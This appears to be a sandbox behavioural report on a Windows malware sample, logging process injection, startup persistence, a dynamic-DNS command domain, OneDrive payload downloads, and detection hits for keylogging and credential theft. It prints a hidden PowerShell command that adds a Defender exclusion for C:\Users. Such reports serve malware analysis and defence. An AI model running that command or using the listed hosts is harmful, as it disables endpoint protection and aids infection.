vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632820 registers.edi: 1632908 registers.eax: 23117 registers.ebp: 1632880 registers.edx: 0 registers.ebx: 0 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7730af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632672 registers.edi: 1632768 registers.eax: 23117 registers.ebp: 1632732 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999575552	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET http://geoplugin.net/json.gp

Connects to a Dynamic DNS Domain (1 event)

domain

blackwealth001.duckdns.org

Performs some HTTP requests (4 events)

request	GET http://geoplugin.net/json.gp
request	GET https://onedrive.live.com/download?cid=F547EE3E8FFF6BF5&resid=F547EE3E8FFF6BF5%21453&authkey=AOijTcPaFAa_sFY
request	GET https://xxggqg.bn.files.1drv.com/y4mo-OJo9wpmax2OvB29vRxbCR_XHI1S9TO9DxkvzSDmOtvVCfdjFA5iJe_tsCB5hke4QTjJLqf2DXsOokiGFDWYTUPxE1cccg9s5CHpH4mgpeJk7DEz2hTWHtbtslcxa5Szl4466KRJBjr-OM68hUz0Mri9n2FXq4bERFOmqvGuyLFMUhC1mk5TTcJ_Nro0Wjpsy2YHstADf0g6Zn42Lxg-w/Oywnaspxncyxayhkogvpxcsolzrnnly?download&psid=1
request	GET https://xxggqg.bn.files.1drv.com/y4mZ04JFnfIkWTrcbGjKJqnT1_whH5a4gewQUd9rU-zn-XASy9kj8861d5lBJpZeiYItjRRzNnljnkwb-cBR7SG3qIXnbzoRculh-hJehFsDMopV_mS3cHJ15pKloJfM014cqwcYcymtXfE3IbN-GlX5I6C_DkCFpK_5vHbP03E9NaOhkc8UXhmv9g4lALU24-ASME_KLf4QhHXs5iYy9VoUg/Oywnaspxncyxayhkogvpxcsolzrnnly?download&psid=1

Allocates read-write-execute memory (usually to unpack itself) (50 out of 187 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00640000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x031e6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x031e6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x031e6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x031e6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x031e6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x031e6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x031e6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x031e6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 region_size: 516096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10590000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046d6000 process_handle: 0xffffffff	1

Creates executable files on the filesystem (3 events)

file	C:\Users\Public\Libraries\Cdex.bat
file	C:\Users\Public\Libraries\Oywnaspt.bat
file	C:\Users\Public\Libraries\OywnaspO.bat

Creates a shortcut to an executable file (1 event)

file	C:\Users\Public\Libraries\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline	powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
cmdline	C:\Windows\system32\cmd.exe /K C:\Users\Public\Libraries\OywnaspO.bat

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW May 24, 2022, 6:27 p.m.	thread_identifier: 2832 thread_handle: 0x00000088 process_identifier: 2828 current_directory: filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 81920 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x031d1000 process_handle: 0xffffffff	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 24, 2022, 6:27 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (50 out of 62 events)

description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Take ScreenShot	rule	ScreenShot
description	Communications use DNS	rule	Network_DNS
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Steal credential	rule	local_credential_Steal
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win
description	File Downloader	rule	Network_Downloader
description	Escalate priviledges	rule	Escalate_priviledges
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communications over FTP	rule	Network_FTP
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Take ScreenShot	rule	ScreenShot
description	Communications use DNS	rule	Network_DNS
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Steal credential	rule	local_credential_Steal
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win
description	File Downloader	rule	Network_Downloader
description	Escalate priviledges	rule	Escalate_priviledges
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
cmdline	net session
cmdline	C:\Windows\system32\cmd.exe /K C:\Users\Public\Libraries\OywnaspO.bat

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: 69132fae67a6936b444b3e031c52c31a1d08b1ee

Allocates execute permission to another process indicative of possible code injection (12 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 3012 region_size: 516096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10590000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000574	1
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000574	1
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00100000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000574	1
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00110000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000574	1
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00160000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000574	1
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00010000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000574	1
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x001f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000574	1
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00200000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000574	1
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00210000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000574	1
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00220000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000574	1
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00240000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000574	1
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00250000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000574	1

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Oywnasp

reg_value

C:\Users\Public\Libraries\psanwyO.url

Deletes executed files from disk (2 events)

file
file	C:\Users\Public\Libraries\Oywnaspt.bat

Creates a thread using CreateRemoteThread in a non-child process indicative of process injection (5 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2352 created a remote thread in non-child process 3012
CreateRemoteThread May 24, 2022, 6:27 p.m.	thread_identifier: 3048 process_identifier: 3012 function_address: 0x000f0000 flags: 0 stack_size: 0 parameter: 0x00000000 process_handle: 0x00000574	1	1392	0
CreateRemoteThread May 24, 2022, 6:27 p.m.	thread_identifier: 3052 process_identifier: 3012 function_address: 0x00010000 flags: 0 stack_size: 0 parameter: 0x00160000 process_handle: 0x00000574	1	1392	0
CreateRemoteThread May 24, 2022, 6:27 p.m.	thread_identifier: 3056 process_identifier: 3012 function_address: 0x00220000 flags: 0 stack_size: 0 parameter: 0x00210000 process_handle: 0x00000574	1	1424	0
CreateRemoteThread May 24, 2022, 6:27 p.m.	thread_identifier: 3060 process_identifier: 3012 function_address: 0x00250000 flags: 0 stack_size: 0 parameter: 0x00240000 process_handle: 0x00000574	1	1408	0

Manipulates memory of a non-child process indicative of process injection (13 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2352 manipulating memory of non-child process 3012
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 3012 region_size: 516096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10590000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000574	1	0	0
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000574	1	0	0
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00100000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000574	1	0	0
